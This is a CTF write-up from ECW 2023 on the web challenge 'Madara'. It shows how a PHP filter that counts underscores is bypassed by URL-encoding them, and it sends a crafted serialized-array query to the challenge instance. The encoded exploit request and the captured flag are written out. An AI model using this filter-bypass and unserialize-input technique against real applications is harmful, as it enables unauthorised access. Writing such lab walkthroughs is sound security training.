Skip to main content

[ECW] - Madara

·2 mins· 0 · 0 ·
CTF ECW Web
JustinType
Author
JustinType
Auditor - Pentester @ Wavestone
Table of Contents
ECW 2023 - This article is part of a series.
Part 3: This Article

Statement #


Enonce

Source Code Analysis #


When we visit the instance, here’s what we get:

Chall

After a quick read of the code, it appears that we need to send a request to the server.

To get the flag, the value of the variable unserialize(@$__)['o']['k'] must be equal to 'imBored', and the value of the variable @__ must be equal to 'Madara'.

Testing the 1st condition #

So, I send the following request to the server to check that I understand the code correctly:

http://instances.challenge-ecw.fr:36111/?__=Madara

Nono

Okay, great! I’m entering the if(@$__==='Madara') condition.

Testing the 2nd condition #

But for the second variable, it gets complicated because if we send more than 4 characters of _ (underscore) or a single . (dot), the server will send us the message “You have used too much _” :

TooMuch1

TooMuch2

This corresponds to the code:

$query=$_SERVER["QUERY_STRING"];
parse_str($query);
if ((substr_count($query,'_')>=4)||(substr_count($query,'.')>0)){
    die('You have used too much _');
}

Therefore, we cannot send a request like:

http://instances.challenge-ecw.fr:36111/?__=Madara&___=value

As we pass these parameters in a URL, it is likely possible to encode them. I will then search for how to encode the special character _ (underscore), and I find:

Encoder

I could replace all _ (underscore) characters with %5F

Construction of the Final Request #


All that’s left is to create a serialized variable equal to imBored in the array ['o']['k']. Simply use the serialize() function of PHP. I will also check that we can find this variable with the unserialize() function that will be used by the server:

<?php
$array["o"]["k"] = "imBored";
$test = serialize($array);
print($test);
print("\n");
print(unserialize($test)['o']['k']);
?>

Output:
a:1:{s:1:"o";a:1:{s:1:"k";s:7:"imBored";}}
imBored

Perfect, all that’s left is to encode the request:

http://instances.challenge-ecw.fr:36111/?__=Madara&___=a:1:{s:1:"o";a:1:{s:1:"k";s:7:"imBored";}}

This gives us:

http://instances.challenge-ecw.fr:36111/?%5F%5F=Madara&%5F%5F%5F=a:1:{s:1:%22o%22;a:1:{s:1:%22k%22;s:7:%22imBored%22;}}

Flag #


Flag

(The URL shown in the screenshot is not encoded because it is automatically decoded by my browser, but the server did receive the encoded request)

🚩 Flag: ECW{C3u7pdBCAfsmbp8eq5T2}

ECW 2023 - This article is part of a series.
Part 3: This Article